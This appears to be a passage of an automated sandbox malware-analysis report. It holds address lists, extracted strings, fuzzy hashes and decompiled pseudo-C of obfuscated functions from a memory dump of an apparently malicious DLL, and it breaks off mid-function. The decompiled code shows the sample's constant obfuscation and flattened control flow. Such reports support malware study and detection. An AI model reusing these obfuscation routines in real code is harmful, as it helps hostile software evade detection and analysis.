0x100044f9
0x10004500
0x10004507
0x10004514
0x10004517
0x1000451a
0x10004521
0x10004528
0x1000452f
0x10004536
0x1000453d
0x10004544
0x1000454b
0x10004552
0x10004559
0x10004560
0x1000456e
0x10004571
0x10004575
0x1000457c
0x10004583
0x1000458a
0x10004594
0x10004599
0x1000459e
0x100045a5
0x100045ac
0x100045b3
0x100045ba
0x100045c1
0x100045c5
0x100045d0
0x100045d3
0x100045d6
0x100045dd
0x100045e8
0x100045eb
0x100045f2
0x100045f9
0x10004607
0x1000460a
0x1000460e
0x10004615
0x1000461c
0x10004620
0x10004624
0x1000462b
0x10004632
0x1000463c
0x1000463f
0x10004642
0x10004649
0x10004650
0x10004657
0x1000465e
0x10004665
0x10004669
0x10004670
0x10004677
0x1000467e
0x10004685
0x100046fa
0x100046fa
0x100046fe
0x00000000
0x00000000
0x10004692
0x100046e0
0x100046e7
0x100046f2
0x100046f7
0x10004694
0x100046a4
0x100046a9
0x100046af
0x10004707
0x100046b1
0x100046b8
0x100046c4
0x100046d8
0x100046dd
0x00000000
0x100046dd
0x100046af
0x10004692
0x10004706

Strings

!2', xrefs: 100045B3
=p, xrefs: 10004657
HO, xrefs: 10004528
g6<, xrefs: 10004615
x., xrefs: 1000462B

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: !2'$HO$g6<$x.$=p
API String ID: 0-4171664252
Opcode ID: 24b4532317f563dfc1b9e9110f70c1b0074d8aafbeda0faad4dfcb9e76c7b15f
Instruction ID: a1891c2fd6bf67de1a0b7545c9bd0f04bbbdbb7981b9d30bb3eb519bdefdcb02
Opcode Fuzzy Hash: 24b4532317f563dfc1b9e9110f70c1b0074d8aafbeda0faad4dfcb9e76c7b15f
Instruction Fuzzy Hash: D16120B1D01309EBDF18CFA0D98A9DEFBB2FB44314F208158E516B6260D7B56A48CF94

Uniqueness

Uniqueness Score: -1.00%

Function 1000A6F7, Relevance: 5.3, Strings: 4, Instructions: 290
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E1000A6F7() {
				signed int _t297;
				intOrPtr _t298;
				signed int _t303;
				signed char _t319;
				signed int _t325;
				intOrPtr _t326;
				signed char _t333;
				signed int _t352;
				signed int _t366;
				signed int _t369;
				signed int _t370;
				signed int _t371;
				signed int _t372;
				signed int _t373;
				signed int _t374;
				signed int _t375;
				intOrPtr _t379;
				void* _t381;

				 *(_t381 + 0x7c) =  *(_t381 + 0x7c) & 0x00000000;
				 *(_t381 + 0x80) =  *(_t381 + 0x80) & 0x00000000;
				_t325 = 0x69fb2c6;
				 *(_t381 + 0x78) = 0x9e5613;
				 *(_t381 + 0x10) = 0x8681bb;
				 *(_t381 + 0x10) =  *(_t381 + 0x10) >> 0xf;
				_t369 = 0x70;
				 *(_t381 + 0x20) =  *(_t381 + 0x10) / _t369;
				 *(_t381 + 0x20) =  *(_t381 + 0x20) + 0xc450;
				 *(_t381 + 0x20) =  *(_t381 + 0x20) ^ 0x0007d00e;
				 *(_t381 + 0x18) = 0x446662;
				_t20 = _t381 + 0x18; // 0x446662
				 *(_t381 + 0x1c) =  *_t20 * 0x6e;
				 *(_t381 + 0x1c) =  *(_t381 + 0x1c) + 0x699e;
				 *(_t381 + 0x1c) =  *(_t381 + 0x1c) ^ 0x9291a753;
				 *(_t381 + 0x1c) =  *(_t381 + 0x1c) ^ 0x8ff5b9f4;
				 *(_t381 + 0x3c) = 0x40eb09;
				 *(_t381 + 0x3c) =  *(_t381 + 0x3c) | 0x42c5f737;
				 *(_t381 + 0x3c) =  *(_t381 + 0x3c) + 0x9e13;
				 *(_t381 + 0x3c) =  *(_t381 + 0x3c) ^ 0x42cff9d2;
				 *(_t381 + 0x5c) = 0x194280;
				 *(_t381 + 0x5c) =  *(_t381 + 0x5c) | 0x77aff03e;
				 *(_t381 + 0x5c) =  *(_t381 + 0x5c) + 0xfffffae6;
				 *(_t381 + 0x5c) =  *(_t381 + 0x5c) ^ 0x77b7fd30;
				 *(_t381 + 0x54) = 0xf6940f;
				 *(_t381 + 0x54) =  *(_t381 + 0x54) / _t369;
				 *(_t381 + 0x54) =  *(_t381 + 0x54) ^ 0x14c22b44;
				 *(_t381 + 0x54) =  *(_t381 + 0x54) ^ 0x14ca0964;
				 *(_t381 + 0x4c) = 0x948626;
				 *(_t381 + 0x4c) =  *(_t381 + 0x4c) | 0x64945d7f;
				 *(_t381 + 0x4c) =  *(_t381 + 0x4c) ^ 0xe254a92e;
				 *(_t381 + 0x4c) =  *(_t381 + 0x4c) ^ 0x86cc41de;
				 *(_t381 + 0x44) = 0x413f9d;
				_t370 = 0x28;
				 *(_t381 + 0x44) =  *(_t381 + 0x44) * 0x38;
				 *(_t381 + 0x44) =  *(_t381 + 0x44) >> 0xc;
				 *(_t381 + 0x44) =  *(_t381 + 0x44) ^ 0x00085e94;
				 *(_t381 + 0x78) = 0xd48aa1;
				 *(_t381 + 0x78) =  *(_t381 + 0x78) >> 0xf;
				 *(_t381 + 0x78) =  *(_t381 + 0x78) ^ 0x0000bec9;
				 *(_t381 + 0x68) = 0x726c1d;
				 *(_t381 + 0x68) =  *(_t381 + 0x68) + 0xba47;
				 *(_t381 + 0x68) =  *(_t381 + 0x68) ^ 0x007dc003;
				 *(_t381 + 0x48) = 0xc669d4;
				 *(_t381 + 0x48) =  *(_t381 + 0x48) / _t370;
				 *(_t381 + 0x48) =  *(_t381 + 0x48) ^ 0x15b8415a;
				 *(_t381 + 0x48) =  *(_t381 + 0x48) ^ 0x15b3818b;
				 *(_t381 + 0x64) = 0x8aed5f;
				 *(_t381 + 0x64) =  *(_t381 + 0x64) >> 0xa;
				_t371 = 0x25;
				 *(_t381 + 0x60) =  *(_t381 + 0x64) * 0x6f;
				 *(_t381 + 0x60) =  *(_t381 + 0x60) ^ 0x0006c1b9;
				 *(_t381 + 0x24) = 0x195f27;
				 *(_t381 + 0x24) =  *(_t381 + 0x24) | 0x1ed85d2e;
				 *(_t381 + 0x24) =  *(_t381 + 0x24) >> 1;
				 *(_t381 + 0x24) =  *(_t381 + 0x24) >> 1;
				 *(_t381 + 0x24) =  *(_t381 + 0x24) ^ 0x07bb434e;
				 *(_t381 + 0x4c) = 0x5b1adc;
				 *(_t381 + 0x4c) =  *(_t381 + 0x4c) / _t371;
				 *(_t381 + 0x4c) =  *(_t381 + 0x4c) >> 0xd;
				 *(_t381 + 0x4c) =  *(_t381 + 0x4c) ^ 0x000e9d6a;
				 *(_t381 + 0x2c) = 0x49daab;
				 *(_t381 + 0x2c) =  *(_t381 + 0x2c) + 0x6e5d;
				 *(_t381 + 0x2c) =  *(_t381 + 0x2c) + 0x1af1;
				_t372 = 0x4e;
				_t366 =  *(_t381 + 0x80);
				 *(_t381 + 0x2c) =  *(_t381 + 0x2c) / _t372;
				 *(_t381 + 0x2c) =  *(_t381 + 0x2c) ^ 0x00036c2a;
				 *(_t381 + 0x6c) = 0x58a89;
				 *(_t381 + 0x70) =  *(_t381 + 0x6c) / _t372;
				 *(_t381 + 0x70) =  *(_t381 + 0x70) ^ 0x0007180d;
				 *(_t381 + 0x58) = 0xc3517c;
				 *(_t381 + 0x58) =  *(_t381 + 0x58) >> 9;
				 *(_t381 + 0x58) =  *(_t381 + 0x58) | 0xe609c541;
				 *(_t381 + 0x58) =  *(_t381 + 0x58) ^ 0xe60ad4fc;
				 *(_t381 + 0x20) = 0x2c6169;
				 *(_t381 + 0x20) =  *(_t381 + 0x20) ^ 0xd3fada11;
				 *(_t381 + 0x20) =  *(_t381 + 0x20) ^ 0xaa81649f;
				 *(_t381 + 0x20) =  *(_t381 + 0x20) + 0x88b8;
				 *(_t381 + 0x20) =  *(_t381 + 0x20) ^ 0x79555001;
				 *(_t381 + 0x14) = 0x87dd3;
				_t373 = 0x37;
				_t379 =  *((intOrPtr*)(_t381 + 0x84));
				 *(_t381 + 0x14) =  *(_t381 + 0x14) * 0x3a;
				 *(_t381 + 0x14) =  *(_t381 + 0x14) / _t373;
				 *(_t381 + 0x14) =  *(_t381 + 0x14) << 5;
				 *(_t381 + 0x14) =  *(_t381 + 0x14) ^ 0x011fa387;
				 *(_t381 + 0x38) = 0xcd5eca;
				 *(_t381 + 0x38) =  *(_t381 + 0x38) + 0xffff9c50;
				 *(_t381 + 0x38) =  *(_t381 + 0x38) + 0xd188;
				 *(_t381 + 0x38) =  *(_t381 + 0x38) ^ 0x00c1dc27;
				 *(_t381 + 0x80) = 0xae2221;
				 *(_t381 + 0x80) =  *(_t381 + 0x80) + 0x146d;
				 *(_t381 + 0x80) =  *(_t381 + 0x80) ^ 0x00ab0c10;
				 *(_t381 + 0x74) = 0xe3b803;
				 *(_t381 + 0x74) =  *(_t381 + 0x74) << 0xe;
				 *(_t381 + 0x74) =  *(_t381 + 0x74) ^ 0xee07cdd8;
				 *(_t381 + 0x18) = 0x8c4d4c;
				 *(_t381 + 0x18) =  *(_t381 + 0x18) | 0x35a13f9a;
				 *(_t381 + 0x18) =  *(_t381 + 0x18) >> 7;
				 *(_t381 + 0x18) =  *(_t381 + 0x18) >> 7;
				 *(_t381 + 0x18) =  *(_t381 + 0x18) ^ 0x000e00ef;
				 *(_t381 + 0x34) = 0xd5bb3;
				 *(_t381 + 0x34) =  *(_t381 + 0x34) + 0xf64e;
				 *(_t381 + 0x34) =  *(_t381 + 0x34) << 3;
				_t374 = 0x4f;
				 *(_t381 + 0x34) =  *(_t381 + 0x34) / _t374;
				 *(_t381 + 0x34) =  *(_t381 + 0x34) ^ 0x000f2543;
				 *(_t381 + 0x2c) = 0xc0584e;
				 *(_t381 + 0x2c) =  *(_t381 + 0x2c) ^ 0xf9017734;
				_t375 = 0x50;
				 *(_t381 + 0x28) =  *(_t381 + 0x2c) / _t375;
				 *(_t381 + 0x28) =  *(_t381 + 0x28) ^ 0xc022955e;
				 *(_t381 + 0x28) =  *(_t381 + 0x28) ^ 0xc33c2cd6;
				while(1) {
					L1:
					_t352 =  *(_t381 + 0x78);
					while(1) {
						L2:
						_t297 =  *(_t381 + 0x68);
						L3:
						while(_t325 != 0xa5acba) {
							if(_t325 == 0x13eb711) {
								_t303 = E100202B3( *((intOrPtr*)(_t381 + 0x30)),  *(_t381 + 0x28), __eflags,  *(_t381 + 0x44), _t381 + 0x88, 0x10025000,  *(_t381 + 0x58));
								_t352 =  *(_t381 + 0x88);
								_t381 = _t381 + 0x10;
								 *(_t381 + 0x80) = _t303;
								_t366 = _t303;
								_t297 = _t303 +  *((intOrPtr*)(_t381 + 0x84));
								_t325 = 0x831e991;
								 *(_t381 + 0x68) = _t297;
								continue;
							} else {
								if(_t325 == 0x69fb2c6) {
									_t325 = 0x13eb711;
									_t352 =  *0x10025214 + 4;
									 *(_t381 + 0x78) = _t352;
									goto L2;
								} else {
									if(_t325 == 0x7689292) {
										E100088FC( *(_t381 + 0x7c),  *(_t381 + 0x20),  *(_t381 + 0x38),  *(_t381 + 0x2c),  *(_t381 + 0x80));
									} else {
										if(_t325 == 0x831e991) {
											_push(_t325);
											_t379 = E100134E7(_t325, 0x6c);
											_t381 = _t381 + 0xc;
											__eflags = _t379;
											if(__eflags != 0) {
												_t325 = 0xbb0b8c8;
												goto L1;
											}
										} else {
											if(_t325 == 0xba6189a) {
												__eflags = _t366 - _t297;
												asm("sbb ecx, ecx");
												_t325 = (_t325 & 0x00c956ff) + 0x7689292;
												continue;
											} else {
												if(_t325 != 0xbb0b8c8) {
													L17:
													__eflags = _t325 - 0xe51045;
													if(__eflags != 0) {
														L2:
														_t297 =  *(_t381 + 0x68);
														continue;
													}
												} else {
													_push( *(_t381 + 0x24));
													_push( *(_t381 + 0x64));
													_push( *(_t381 + 0x4c));
													 *((char*)(_t381 + 0x6b)) =  *_t366;
													 *((char*)(_t381 + 0x4b)) =  *((intOrPtr*)(_t366 + 2));
													E1000FFBA( *(_t381 + 0x6f) & 0x000000ff,  *(_t366 + 3) & 0x000000ff,  *(_t381 + 0x78),  *(_t381 + 0x54),  *(_t366 + 3) & 0x000000ff, _t379 + 0x14,  *(_t381 + 0x88), 0x10,  *(_t381 + 0x68), E1000416C( *(_t381 + 0x70), 0x10001534),  *(_t381 + 0x28));
													E1000B952( *(_t381 + 0x4c), _t312,  *(_t381 + 0x6c),  *((intOrPtr*)(_t381 + 0xb0)));
													_t381 = _t381 + 0x3c;
													 *(_t379 + 0x64) = ( *(_t366 + 4) & 0x000000ff) << 0x00000008 |  *(_t366 + 5) & 0x000000ff;
													_t319 =  *((intOrPtr*)(_t366 + 6));
													_t333 =  *((intOrPtr*)(_t366 + 7));
													_t366 = _t366 + 8;
													_t325 = 0xa5acba;
													 *(_t379 + 0x44) = (_t319 & 0x000000ff) << 0x00000008 | _t333 & 0x000000ff;
													while(1) {
														L1:
														_t352 =  *(_t381 + 0x78);
														while(1) {
															L2:
															_t297 =  *(_t381 + 0x68);
															goto L3;
														}
													}
												}
											}
										}
									}
								}
							}
							_t326 =  *0x10025214;
							 *(_t326 + 0x18) =  *(_t326 + 0x18) & 0x00000000;
							 *((intOrPtr*)(_t326 + 0x14)) =  *((intOrPtr*)(_t326 + 4));
							__eflags = 1;
							return 1;
						}
						_t298 =  *0x10025214;
						_t325 = 0xba6189a;
						 *_t352 = _t379;
						_t352 = _t379 + 0x38;
						 *(_t381 + 0x78) = _t352;
						_t264 = _t298 + 0x38;
						 *_t264 =  *((intOrPtr*)(_t298 + 0x38)) + 1;
						__eflags =  *_t264;
						goto L17;
					}
				}
			}

0x1000a6fd
0x1000a704
0x1000a70c
0x1000a711
0x1000a719
0x1000a721
0x1000a730
0x1000a735
0x1000a739
0x1000a741
0x1000a749
0x1000a751
0x1000a758
0x1000a75c
0x1000a764
0x1000a76c
0x1000a774
0x1000a77c
0x1000a784
0x1000a78c
0x1000a794
0x1000a79c
0x1000a7a4
0x1000a7ac
0x1000a7b4
0x1000a7c4
0x1000a7c8
0x1000a7d0
0x1000a7d8
0x1000a7e0
0x1000a7e8
0x1000a7f0
0x1000a7f8
0x1000a805
0x1000a808
0x1000a80c
0x1000a811
0x1000a819
0x1000a821
0x1000a826
0x1000a82e
0x1000a836
0x1000a83e
0x1000a846
0x1000a856
0x1000a85a
0x1000a862
0x1000a86a
0x1000a872
0x1000a87c
0x1000a87d
0x1000a881
0x1000a889
0x1000a891
0x1000a899
0x1000a89d
0x1000a8a1
0x1000a8a9
0x1000a8b7
0x1000a8bb
0x1000a8c0
0x1000a8ca
0x1000a8d2
0x1000a8da
0x1000a8e8
0x1000a8ed
0x1000a8f4
0x1000a8f8
0x1000a900
0x1000a910
0x1000a916
0x1000a91e
0x1000a926
0x1000a92b
0x1000a933
0x1000a93b
0x1000a943
0x1000a94b
0x1000a953
0x1000a95b
0x1000a963
0x1000a970
0x1000a973
0x1000a97a
0x1000a986
0x1000a98a
0x1000a98f
0x1000a997
0x1000a99f
0x1000a9a7
0x1000a9af
0x1000a9b7
0x1000a9c2
0x1000a9cd
0x1000a9d8
0x1000a9e0
0x1000a9e5
0x1000a9ed
0x1000a9f5
0x1000a9fd
0x1000aa02
0x1000aa07
0x1000aa0f
0x1000aa17
0x1000aa1f
0x1000aa28
0x1000aa2d
0x1000aa33
0x1000aa3b
0x1000aa43
0x1000aa4f
0x1000aa52
0x1000aa56
0x1000aa5e
0x1000aa66
0x1000aa66
0x1000aa66
0x1000aa6a
0x1000aa6a
0x1000aa6a
0x00000000
0x1000aa6e
0x1000aa80
0x1000abef
0x1000abf4
0x1000abfb
0x1000abfe
0x1000ac05
0x1000ac07
0x1000ac0e
0x1000ac13
0x00000000
0x1000aa86
0x1000aa8c
0x1000abc1
0x1000abc6
0x1000abc9
0x00000000
0x1000aa92
0x1000aa98
0x1000ac56
0x1000aa9e
0x1000aaa4
0x1000ab9b
0x1000aba4
0x1000aba6
0x1000aba9
0x1000abab
0x1000abb1
0x00000000
0x1000abb1
0x1000aaaa
0x1000aab0
0x1000ab76
0x1000ab78
0x1000ab80
0x00000000
0x1000aab6
0x1000aabc
0x1000ac32
0x1000ac32
0x1000ac38
0x1000aa6a
0x1000aa6a
0x00000000
0x1000aa6a
0x1000aac2
0x1000aac2
0x1000aacd
0x1000aad4
0x1000aadf
0x1000aae6
0x1000ab21
0x1000ab37
0x1000ab40
0x1000ab4e
0x1000ab52
0x1000ab55
0x1000ab58
0x1000ab61
0x1000ab6d
0x1000aa66
0x1000aa66
0x1000aa66
0x1000aa6a
0x1000aa6a
0x1000aa6a
0x00000000
0x1000aa6a
0x1000aa6a
0x1000aa66
0x1000aabc
0x1000aab0
0x1000aaa4
0x1000aa98
0x1000aa8c
0x1000ac5e
0x1000ac6a
0x1000ac6e
0x1000ac73
0x1000ac7b
0x1000ac7b
0x1000ac1c
0x1000ac21
0x1000ac26
0x1000ac28
0x1000ac2b
0x1000ac2f
0x1000ac2f
0x1000ac2f
0x00000000
0x1000ac2f
0x1000aa6a

Strings

]n, xrefs: 1000A8D2
ia,, xrefs: 1000A93B
@, xrefs: 1000A774
bfD, xrefs: 1000A751

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: @$]n$bfD$ia,
API String ID: 0-489768366
Opcode ID: 74b0b95590d871c42a8fa2af8d40d0829ecdbef9795916aed5475f578cb67074
Instruction ID: 6a62351d5e500d29ba7eb98bc21c95122bc2def074867450927d10791fc6af94
Opcode Fuzzy Hash: 74b0b95590d871c42a8fa2af8d40d0829ecdbef9795916aed5475f578cb67074
Instruction Fuzzy Hash: 37D152715083809FD368CF25C58565BBFE2FBC5788F10890DF6DA86264D3B59A89CF82

Uniqueness

Uniqueness Score: -1.00%

Function 10020701, Relevance: 5.3, Strings: 4, Instructions: 271
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E10020701(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr* _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				intOrPtr _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				intOrPtr _t282;
				intOrPtr* _t287;
				intOrPtr _t295;
				intOrPtr _t296;
				intOrPtr _t297;
				intOrPtr _t299;
				intOrPtr _t301;
				intOrPtr _t302;
				signed int _t325;
				signed int _t326;
				signed int _t327;
				signed int _t328;
				signed int _t329;
				signed int _t330;
				signed int _t331;
				intOrPtr _t332;
				void* _t334;
				intOrPtr _t335;
				intOrPtr _t336;
				intOrPtr _t337;
				signed int* _t338;

				_t297 = __ecx;
				_t338 =  &_v140;
				_v32 = __edx;
				_v40 = __ecx;
				_v16 = 0x45aa29;
				_v4 = 0;
				_v12 = 0xeb19c2;
				_v8 = 0x8b8440;
				_v80 = 0xa91352;
				_v80 = _v80 >> 5;
				_v36 = 0;
				_v80 = _v80 * 0x1f;
				_t334 = 0x74186de;
				_v80 = _v80 ^ 0x00a3caa6;
				_v96 = 0x3b4393;
				_v96 = _v96 + 0xffff02ab;
				_v96 = _v96 + 0xf577;
				_v96 = _v96 ^ 0x003a64ec;
				_v100 = 0x33a29b;
				_t325 = 0x3b;
				_v100 = _v100 / _t325;
				_v100 = _v100 + 0xfffffd90;
				_v100 = _v100 ^ 0x00074a08;
				_v76 = 0xb830c8;
				_v76 = _v76 | 0x33f57df4;
				_v76 = _v76 + 0xffffda2d;
				_v76 = _v76 ^ 0x33fa7864;
				_v92 = 0xb97790;
				_v92 = _v92 << 6;
				_v92 = _v92 << 7;
				_v92 = _v92 ^ 0x2ef5f55c;
				_v44 = 0x9e7373;
				_t326 = 0x4b;
				_v44 = _v44 * 0x2f;
				_v44 = _v44 ^ 0x1d142d89;
				_v56 = 0x791c27;
				_v56 = _v56 + 0xffff0571;
				_v56 = _v56 ^ 0x00797454;
				_v136 = 0x51205a;
				_v136 = _v136 | 0x503b7a9e;
				_v136 = _v136 * 0x1e;
				_v136 = _v136 ^ 0x8a415c27;
				_v136 = _v136 ^ 0xe43a4a76;
				_v48 = 0x5d6dc0;
				_v48 = _v48 / _t326;
				_v48 = _v48 ^ 0x00033f56;
				_v68 = 0x23a24e;
				_t327 = 0x37;
				_v68 = _v68 / _t327;
				_v68 = _v68 ^ 0x00026d6c;
				_v128 = 0x3d1884;
				_v128 = _v128 * 5;
				_v128 = _v128 | 0xf5a9dd54;
				_v128 = _v128 * 0x7e;
				_v128 = _v128 ^ 0xf1834560;
				_v120 = 0x897c7f;
				_v120 = _v120 | 0x46f68575;
				_v120 = _v120 ^ 0x349afbc9;
				_v120 = _v120 << 1;
				_v120 = _v120 ^ 0xe4c8e227;
				_v140 = 0xf04c4c;
				_v140 = _v140 ^ 0x80bea6e4;
				_t328 = 0x5b;
				_t337 = _v32;
				_v140 = _v140 * 0x13;
				_t296 = _v32;
				_v140 = _v140 / _t328;
				_v140 = _v140 ^ 0x0172bba1;
				_v84 = 0xe2023b;
				_t329 = 0x25;
				_v84 = _v84 / _t329;
				_v84 = _v84 >> 6;
				_v84 = _v84 ^ 0x000b5e72;
				_v112 = 0x1ea78b;
				_v112 = _v112 ^ 0xb1f74679;
				_v112 = _v112 | 0xa5887eef;
				_v112 = _v112 + 0x3189;
				_v112 = _v112 ^ 0xb5eefc99;
				_v88 = 0xe19736;
				_v88 = _v88 + 0xecee;
				_v88 = _v88 + 0x21f4;
				_v88 = _v88 ^ 0x00e099d3;
				_v52 = 0xeede2d;
				_v52 = _v52 ^ 0xef09cc7d;
				_v52 = _v52 ^ 0xefef0403;
				_v124 = 0x50248d;
				_v124 = _v124 >> 5;
				_t330 = 0x4d;
				_v124 = _v124 / _t330;
				_t331 = 0x18;
				_v124 = _v124 * 0x46;
				_v124 = _v124 ^ 0x0001537f;
				_v132 = 0x17ebbd;
				_v132 = _v132 << 0x10;
				_v132 = _v132 + 0xfffff7c4;
				_v132 = _v132 << 1;
				_v132 = _v132 ^ 0xd7786ab6;
				_v60 = 0xdef550;
				_v60 = _v60 + 0xffffa272;
				_v60 = _v60 ^ 0x00de7e3c;
				_v108 = 0x747ff8;
				_v108 = _v108 >> 9;
				_v108 = _v108 << 3;
				_v108 = _v108 + 0x5e85;
				_v108 = _v108 ^ 0x000a1334;
				_v116 = 0x74ca9b;
				_v116 = _v116 ^ 0xf900bbec;
				_t332 = _v28;
				_v116 = _v116 / _t331;
				_v116 = _v116 ^ 0x13a425b5;
				_v116 = _v116 ^ 0x19c9514d;
				_v64 = 0x5401b4;
				_v64 = _v64 + 0xf91a;
				_v64 = _v64 ^ 0x0055eaea;
				_v104 = 0xcaaf62;
				_v104 = _v104 | 0x4356054a;
				_v104 = _v104 + 0x5c0e;
				_v104 = _v104 ^ 0x43d6c55b;
				L1:
				while(1) {
					do {
						while(_t334 != 0x10fdad0) {
							if(_t334 == 0x4dd895b) {
								_t299 = E1000559A(_v44, _v56, _t282, _t297,  &_v20, _t337, _v136);
								_t338 =  &(_t338[5]);
								_v36 = _t299;
								if(_t299 == 0) {
									_t335 = _v36;
									L20:
									E100088FC(_v108, _v116, _v64, _v104, _t296);
								} else {
									_t301 = _v20;
									if(_t301 == 0) {
										goto L16;
									} else {
										_v72 = _v72 + _t301;
										_t337 = _t337 - _t301;
										if(_t337 != 0) {
											L10:
											_t282 = _v72;
											L11:
											_t297 = _v40;
											_t334 = 0x4dd895b;
											continue;
										} else {
											_t302 = _t332 + _t332;
											_push(_t302);
											_v24 = _t302;
											_t336 = E100134E7(_t302, _t302);
											_t338 =  &(_t338[3]);
											if(_t336 == 0) {
												goto L16;
											} else {
												E100168F4(_t332, _t336, _v140, _v84, _v112, _t296, _v88);
												E100088FC(_v52, _v124, _v132, _v60, _t296);
												_t337 = _t332;
												_t295 = _t336 + _t332;
												_t332 = _v24;
												_t338 =  &(_t338[8]);
												_v72 = _t295;
												_t296 = _t336;
												if(_t337 == 0) {
													goto L16;
												} else {
													goto L10;
												}
											}
										}
									}
								}
							} else {
								if(_t334 != 0x74186de) {
									goto L15;
								} else {
									_t334 = 0x10fdad0;
									continue;
								}
							}
							L18:
							return _t335;
						}
						_t332 = 0x10000;
						_push(_t297);
						_t282 = E100134E7(_t297, 0x10000);
						_t296 = _t282;
						_t338 =  &(_t338[3]);
						if(_t296 == 0) {
							_t297 = _v40;
							_t334 = 0x4b866e3;
							goto L15;
						} else {
							_v72 = _t282;
							_t337 = 0x10000;
							goto L11;
						}
						goto L18;
						L15:
						_t282 = _v72;
					} while (_t334 != 0x4b866e3);
					L16:
					_t335 = _v36;
					if(_t335 == 0) {
						goto L20;
					} else {
						_t287 = _v32;
						 *_t287 = _t296;
						 *((intOrPtr*)(_t287 + 4)) = _t332 - _t337;
					}
					goto L18;
				}
			}

0x10020701
0x10020701
0x1002070b
0x1002070f
0x10020713
0x10020720
0x10020727
0x10020732
0x1002073d
0x10020745
0x1002074a
0x10020753
0x10020757
0x1002075c
0x10020764
0x1002076c
0x10020774
0x1002077c
0x10020784
0x10020794
0x10020799
0x1002079f
0x100207a7
0x100207af
0x100207b7
0x100207bf
0x100207c7
0x100207cf
0x100207d7
0x100207dc
0x100207e1
0x100207e9
0x100207f6
0x100207f9
0x100207fd
0x10020805
0x1002080d
0x10020815
0x1002081d
0x10020825
0x10020832
0x10020836
0x1002083e
0x10020846
0x10020856
0x1002085a
0x10020862
0x1002086e
0x10020871
0x10020875
0x1002087d
0x1002088a
0x1002088e
0x1002089b
0x1002089f
0x100208a7
0x100208af
0x100208b7
0x100208bf
0x100208c3
0x100208cb
0x100208d3
0x100208e4
0x100208e7
0x100208ee
0x100208fa
0x10020901
0x10020905
0x1002090d
0x10020919
0x1002091e
0x10020924
0x10020929
0x10020931
0x10020939
0x10020941
0x10020949
0x10020951
0x10020959
0x10020961
0x10020969
0x10020971
0x10020979
0x10020981
0x10020989
0x10020991
0x10020999
0x100209a2
0x100209a7
0x100209b2
0x100209b3
0x100209b7
0x100209bf
0x100209c7
0x100209cc
0x100209d4
0x100209d8
0x100209e0
0x100209e8
0x100209f0
0x100209f8
0x10020a00
0x10020a05
0x10020a0a
0x10020a12
0x10020a1a
0x10020a22
0x10020a30
0x10020a37
0x10020a3b
0x10020a43
0x10020a4f
0x10020a57
0x10020a5f
0x10020a67
0x10020a6f
0x10020a77
0x10020a7f
0x00000000
0x10020a87
0x10020a87
0x10020a87
0x10020a99
0x10020acd
0x10020acf
0x10020ad2
0x10020ad8
0x10020be9
0x10020bed
0x10020bfe
0x10020ade
0x10020ade
0x10020ae7
0x00000000
0x10020aed
0x10020aed
0x10020af1
0x10020af3
0x10020b70
0x10020b70
0x10020b74
0x10020b74
0x10020b78
0x00000000
0x10020af5
0x10020af9
0x10020b08
0x10020b0b
0x10020b17
0x10020b19
0x10020b1e
0x00000000
0x10020b24
0x10020b39
0x10020b52
0x10020b57
0x10020b59
0x10020b5c
0x10020b63
0x10020b66
0x10020b6a
0x10020b6e
0x00000000
0x00000000
0x00000000
0x00000000
0x10020b6e
0x10020b1e
0x10020af3
0x10020ae7
0x10020a9b
0x10020aa1
0x00000000
0x10020aa7
0x10020aa7
0x00000000
0x10020aa7
0x10020aa1
0x10020bdd
0x10020be8
0x10020be8
0x10020b86
0x10020b97
0x10020b9a
0x10020b9f
0x10020ba1
0x10020ba6
0x10020bb0
0x10020bb4
0x00000000
0x10020ba8
0x10020ba8
0x10020bac
0x00000000
0x10020bac
0x00000000
0x10020bb9
0x10020bb9
0x10020bbd
0x10020bc9
0x10020bc9
0x10020bcf
0x00000000
0x10020bd1
0x10020bd1
0x10020bd7
0x10020bd9
0x10020bd9
0x00000000
0x10020bcf

Strings

U, xrefs: 10020A5F
Tty, xrefs: 10020815
vJ:, xrefs: 1002083E
d:, xrefs: 1002077C

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: Tty$vJ:$d:$U
API String ID: 0-812098682
Opcode ID: 39bd50f054260530a46216a7d58135e392ce2dfed05e873a65102432227d63f4
Instruction ID: 36df7d48b6a47ddf26655b78f983e76df084c551b73942944962ce119d496c24
Opcode Fuzzy Hash: 39bd50f054260530a46216a7d58135e392ce2dfed05e873a65102432227d63f4
Instruction Fuzzy Hash: 1CD11DB19083819FD3A4CF26D58990BFBE1FBC8758F50892DF5A586221D3B5D909CF82

Uniqueness

Uniqueness Score: -1.00%

Function 10001EE2, Relevance: 5.2, Strings: 4, Instructions: 236
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E10001EE2(intOrPtr* __ecx) {
				char _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				intOrPtr* _v168;
				signed int _v172;
				unsigned int _v176;
				signed int _v180;
				signed int _v184;
				unsigned int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				unsigned int _v208;
				signed int _v212;
				unsigned int _v216;
				void* _t225;
				intOrPtr _t232;
				void* _t238;
				intOrPtr _t243;
				intOrPtr* _t244;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				signed int _t276;
				signed int _t277;
				signed int _t278;
				signed int _t279;
				intOrPtr _t280;
				void* _t281;
